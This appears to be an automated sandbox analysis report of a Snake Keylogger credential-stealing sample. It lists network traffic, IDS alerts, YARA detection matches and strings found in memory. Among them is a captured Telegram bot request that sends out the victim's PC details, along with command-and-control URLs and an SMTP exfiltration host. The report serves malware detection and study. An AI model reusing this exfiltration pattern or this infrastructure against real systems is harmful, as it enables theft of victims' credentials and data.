                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.5:49745 -> 75.102.58.14:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: mail.pymetal.net
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 01 Oct 2024 08:55:37 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.pymetal.net
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.i.lencr.org/0
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.org0#
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2061901731.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2111265878.0000000002701000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20a
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enx
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/x
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49744 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_02ECD5BC0_2_02ECD5BC
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_077325B00_2_077325B0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_077321780_2_07732178
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_077321680_2_07732168
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_07731D400_2_07731D40
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_07733C580_2_07733C58
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 0_2_077319080_2_07731908
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FC1469_2_013FC146
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013F53629_2_013F5362
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FD2C89_2_013FD2C8
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FD5999_2_013FD599
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FC4689_2_013FC468
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FC7389_2_013FC738
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013F69A09_2_013F69A0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013F29E09_2_013F29E0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FCD289_2_013FCD28
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013F9DE09_2_013F9DE0
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FEC189_2_013FEC18
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013FCFF79_2_013FCFF7
                Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exeCode function: 9_2_013F6FC89_2_013F6FC8
